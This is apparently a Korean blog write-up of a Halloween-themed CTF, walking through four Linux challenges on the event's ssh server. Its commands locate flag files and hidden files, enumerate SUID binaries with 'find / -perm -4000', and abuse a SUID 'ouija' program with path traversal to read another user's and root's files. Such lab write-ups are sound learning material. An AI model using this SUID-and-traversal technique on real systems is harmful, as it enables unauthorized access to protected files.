3일간 진행된 CTF이고,

할로윈 컨셉으로 진행된다는것이 재밌었고

문제를 3 phase 로 나눠서 시간에 맞춰 공개했다. 뭔가 시간관리 하기 힘든게 문제도 엄청많았다.

전체 1000명중에 262등 했다.

내가 모르는 내용 정리하려고 중간에 작성한 writeup

좋은 문제 정말 많았는데 대회 끝나고 시간 놓쳐서 정리 못해서 아쉽다.

1. Talking to the Dead 1

1) type
Linux

2) content
We've obtained access to a server maintained by spookyboi. There are four flag files that we need you to read and submit (flag1.txt, flag2.txt, etc). Submit the contents of flag1.txt.

3) writeup

// ssh 로 연결
ssh hacktober@env.hacktober.io

// linux 파일 찾기 명령어
// find . -name "filename" - 현재 디렉토리 하위에서 파일 이름을 가지고 파일을 찾는다.
find . -name "flag1.txt"

// cat 명렁어로 찾은 파일 읽기
cat ./home/luciafer/Documents/flag1.txt

2. Talking to the Dead 2

1) type
Linux

2) content
There's a hidden flag that belongs to luciafer. Submit the contents of the hidden flag2.txt.

3) wirteup

// 검색되지 않는다.
find . name "flag2.txt"

// flag1.txt 디렉토리로 이동
cd ./home/luciafer/Documents

// 숨겨진 파일 확인
ls -al

// cat .flag2.txt

3. Talking to the Dead 3

1) type
Linux

2) content
Submit the contents of flag3.txt from the remote machine.

3) writeup

find . -name "flag3.txt"

// permission denied 권한 없다.
cat ./home/spookyboi/Documents/flag3.txt

find / -perm -4000 -type f 2>/dev/null

/usr/local/bin/ouija

ouija ../../../home/spookyboi/Documents/flag3.txt

4. Talking to the Dead 4

1) type
Linux

2) content
We suspect spookyboi doesn't use the root account for this server. There must be some mechanism used to read the flag4.txt file without gaining root. Submit the contents of flag4.txt from the remote machine.

3) writeup

find . -name "flag4.txt"

cd /usr/local/bin

/usr/local/bin$ ouija ../../../root/flag4.txt